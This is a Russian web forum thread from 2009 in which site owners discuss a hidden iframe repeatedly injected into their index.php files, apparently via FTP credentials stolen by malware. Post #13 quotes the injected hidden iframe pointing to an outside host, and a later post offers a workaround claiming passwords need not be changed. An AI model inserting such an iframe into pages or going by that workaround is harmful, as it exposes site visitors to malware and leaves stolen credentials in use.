В Index.php постоянно повляется непонятный iframe

123
_Unikum_
На сайте с 28.06.2008
Offline
117
#11
Delarante:
Он может быть в папке шаблона, каких либо плагинов, и тому подобному. Подумайте что есть общего у этих сайтов в Топе и нет у тех которые не заражены... Общий шаблон, сборка дле с одного ресурса, если не лицензия конечно, и т.д.

Шаблоны разные, дле лицензия. Я думаю на самом деле мой ноут трояна поймал, надо просмотреть антивирусом. Антивирус давно не обновлял.

С Уважением, Сергей.
BlackSmoke
На сайте с 22.11.2008
Offline
18
#12

ппц, до чего дошли... Школьники, не изучив пхп, качают эксплойты и заражают сайты. Ибо, кто еще, кроме школьника, будет в index.php вставлять код с незакомментенными кавычками 😂

BlackSmoke добавил 29.07.2009 в 01:18

А по теме: смените фтп клиент и все пароли. Если бяка останется, пишите хостеру.

....
tobto
На сайте с 09.01.2007
Offline
66
#13

Поймал вот такую штуку <iframe src="http://x6r.ru:8080/index.php" width=192 height=154 style="visibility: hidden"></iframe> - появилось за день на разных хостингах, CMS, сайтах. Как эта гадость проникает и размножается?

эвакуатор (http://gruz-taxi.kiev.ua)
V@der
На сайте с 22.11.2007
Offline
96
#14
tobto:
Как эта гадость проникает и размножается?

Через ваш зараженный комп по ФТП.

T
На сайте с 30.07.2009
Offline
12
#15

Ребята, кто как решил проблему? У меня то же самое с iframe...

Среди файлов сайта были подозрительные папки с файлами "18200907sklip" и "ifyak170709" (поиск показывает, что подобные папки не только на моем сайте, но и на массе других). Папки были сразу же удалены, пароль от ftp был изменен. Но яндекс и гугл по-прежнему вторую неделю подряд среди ссылок сайта выдает левые ссылки из этих папок.

При этом, если ссылки нажимать, то естественно они никуда не ведут.

P.S. На компьютере, если что, вирусов тоже уже нет (если вдруг были), т.к. недавно была переустановлена операционная система.

iren K
На сайте с 28.12.2008
Offline
222
#16
Talali:
Ребята, кто как решил проблему?

вообще тема, последние полгода поднимается практ. ежедневно - юзайте поиск: уже все возможные (и невозможные) варианты рассмотрены..(

c уважением Iren
T
На сайте с 30.07.2009
Offline
12
#17

В поиске под эту ситуацию с конкретным вирусом я только данную тему нашла, поэтому интересно.

artsecurity
На сайте с 10.01.2009
Offline
53
#18

Сайт - самописка на php. Была такая болезнь, решилась изменением набора прав.

Вирус однозначно. Либо chmod 444 или в totale файл-изменить атрибуты-444.

Современная автоэлектроника (http://www.dopstore.ru) для железного коня АйCQ: три58-7девять7-82один
V@der
На сайте с 22.11.2007
Offline
96
#19

artsecurity, что скрипту помешает изменить права на файл вновь, если у него есть ваш логин и пароль, под которыми и осуществляется доступ к фтп ?

artsecurity:
totale

Вот им лучше не пользоваться и пароли не сохранять. :)

crucified
На сайте с 12.01.2006
Offline
103
#20

Делюсь способом, который работает с 99% современных вирусов - ифреймеров:

Когда у меня возникла эта проблемма, я не мог поменять фтп пароль, так как основной доступ был у другого человека. Удалив пару раз коды фреймов на десятке своих сайтов, я решил сменить технику.

Как я заметил, ифреймы появляются в файле индекс.пхп или хтмл. Далее я заметил, что код вставляется после тега <body>, если его нет, то тогда - в самый конец документа.

Тогда я создал ловушку, разместив следущий код в файле index.php, в самом начале документа:

<?

$b="<BODY>";

?>

А сам тег <body> я вывел следущим образом:

<<?

echo "bo";

?>dy>

Поняли в чем дело? Первый код - это комментарии в php, содержащие тег, который ищут вирусы. И вирусы начали ставить коды в комментариях, которые не видны на сайте. А второй код body они уже не нашли, хотя возможно и не искали.

Вот и всё. Можно не менять пароль, права, обращаться к хостеру.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий